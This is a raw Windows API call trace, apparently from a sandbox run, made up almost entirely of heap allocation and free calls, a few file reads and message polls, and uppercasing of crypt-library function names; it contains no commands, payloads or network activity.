[0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0186.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0186.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0186.078] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0186.079] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb998, lpOverlapped=0x0) returned 1 [0186.081] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0186.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb998) returned 0xbea018 [0186.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb998) returned 0xbf59b8 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0186.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.083] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb998) returned 0xbea018 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0186.084] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.084] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb998) returned 0xbea018 [0186.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0186.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0186.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0186.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0186.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb998) returned 0xc01358 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0186.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0186.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0186.087] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0186.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.088] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0186.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2728 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0186.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0186.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.089] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0186.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0186.089] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.090] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0186.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.091] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0186.092] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0186.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0186.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.093] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.093] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.093] RtlAllocateHeap (HeapHandle=0x8a0000, 